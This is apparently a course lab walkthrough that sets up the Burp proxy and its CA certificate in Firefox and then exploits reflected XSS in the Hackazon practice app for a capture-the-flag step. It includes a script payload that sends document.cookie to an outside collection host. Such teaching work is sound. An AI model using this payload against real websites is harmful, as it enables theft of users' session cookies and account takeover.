On the Options sub-tab, make sure the proxy is listening on 127.0.0.1:8080 as shown below.
In Preferences, search for proxy. Click the Settings... button.
Configure Firefox to use the 127.0.0.1 proxy on port 8080 for all protocols, as shown below.
On the "HTTP history" sub-tab, you should see a request to http://ad.samsclass.info, as shown below.
At the top right, click "CA Certificate", as shown below.
Save the certificate in your Downloads folder.
In the Certificate Manager box, click the Import... button.
Navigate to the certificate you downloaded, as shown below, and double-click it.
A box pops up, as shown below. Click "Trust this CA to verify websites" and click OK.
In the Certificate Manager box, click OK.
On the "HTTP history" sub-tab, you should see an HTTPS request. Click it.
In the lower pane, on the Request tab, on the Params sub-tab, you should see a PHPSESSID cookie value, as shown below.
No results are found, but the query "shoes" appears in the results page, as shown below.
When data from the user is echoed back on a Web page, if it's not sanitized, it can contain scripts, causesing a reflected XSS vulnerability.
An alert box pops up, as shown below.
Note: some browsers block such injections. When I did this on a Mac on Feb 6, 2020, the pop-up appeared in Brave, Opera, Firefox, and Chrome, but not in Safari.
An alert box pops up, showing cookie values, as shown below. as shown below.
At the top left, click the red HACKAZON logo to return to the home page.
Click a product to view it, as shown below.
Flag M 230.1: Stealing Cookies (10 pts)In the Hackazon page, search for
<script>fetch("https://attack32.samsclass.info/dataview.php?data=" + document.cookie);</script>
In a browser, go to:
Your stolen cookie appears at the end of the list.
The flag is covered by a green box in the image below.
Capturing a Screen ImageCapture a WHOLE-DESKTOP image of Firefox showing the flag.
Save the image as "Proj W 230.1 from YOUR NAME".